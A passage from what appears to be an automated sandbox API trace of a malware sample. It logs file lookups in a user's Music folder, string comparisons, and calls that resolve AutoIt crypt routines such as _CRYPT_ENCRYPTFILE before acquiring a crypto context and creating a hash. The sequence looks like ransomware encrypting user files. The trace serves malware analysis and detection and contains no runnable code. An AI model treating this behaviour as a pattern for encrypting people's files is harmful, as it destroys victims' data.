dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.014] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.014] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.014] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.014] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.014] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc621f80, ftCreationTime.dwHighDateTime=0x1d5ddf6, ftLastAccessTime.dwLowDateTime=0xe95e1f50, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0xe95e1f50, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="v6HGG6Br4L.wav", cAlternateFileName="V6HGG6~1.WAV")) returned 0x90add8 [0188.014] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.014] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.014] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc621f80, ftCreationTime.dwHighDateTime=0x1d5ddf6, ftLastAccessTime.dwLowDateTime=0xe95e1f50, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0xe95e1f50, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="v6HGG6Br4L.wav", cAlternateFileName="V6HGG6~1.WAV")) returned 0x90add8 [0188.014] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.014] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.016] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HGG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GG6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="G6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6Br4L.wav\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.017] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.017] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0188.017] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.017] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.017] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.017] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.017] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.017] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0188.017] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.017] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc621f80, ftCreationTime.dwHighDateTime=0x1d5ddf6, ftLastAccessTime.dwLowDateTime=0xe95e1f50, ftLastAccessTime.dwHighDateTime=0x1d5e5c7, ftLastWriteTime.dwLowDateTime=0xe95e1f50, ftLastWriteTime.dwHighDateTime=0x1d5e5c7, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="v6HGG6Br4L.wav", cAlternateFileName="V6HGG6~1.WAV")) returned 0x90af58 [0188.018] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0188.018] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.018] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.018] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.018] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0188.018] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.018] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0188.018] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.018] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0188.036] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.036] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.036] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.036] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0188.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.036] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0188.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0188.037] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.037] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.037] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.037] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.037] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0188.038] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.038] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.038] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0188.038] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.038] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.038] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0188.038] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.038] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0188.038] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0188.038] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.038] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.038] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0188.038] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.038] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0188.038] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0188.038] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.038] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.039] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.039] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.039] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.039] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0188.039] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.039] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0188.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0188.039] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, 